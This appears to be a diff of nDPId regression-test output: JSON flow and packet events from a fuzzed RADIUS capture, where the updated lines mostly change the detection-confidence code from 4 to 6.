01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1528998372930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998372930,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWBAAP8RAAAKDEAexuIZFXIQBxQCxwAAAbACvzQe93K2s3Upjyh7NVxn+MAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqnkATUwMzExNDgwMjMyNTY4NjMxkHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGggAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDDyMDAw\/jJtNGE5MjI1YiwgNWIyMmE5ZTQvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAQAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzcCAQA4ATAzMTE0ODAyMzI1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAclAFpXQzJUZXN0TGEiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGlAAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWld0QzIgVGVzdCBMYWIaCwAAV8klBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOG4RBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bbJpcmVjdBoMAAAFgwcGwFBKmVASj8JRxOD8ARCA2Tk5GozLCQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":620000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":620000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00197{"error_event_id":2,"error_event_name":"Unknown L3 
protocol","datalink":1,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998557316} 00526{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998557233,"pkt":"ABRP+4rqcNuYVcUnCAAlAAClD1JAAPwRRKvG4hk+CgxAHgcUchAAkYCWC7QAiR2+QwBH7d0zmbIWMmGskGYBNTAzMTE0ODAwNzEzqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":184,"flow_first_seen":1528996068129,"flow_last_seen":1528998376770,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":81573,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":184,"flow_first_seen":1528996068129,"flow_last_seen":1528998376770,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":81573,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
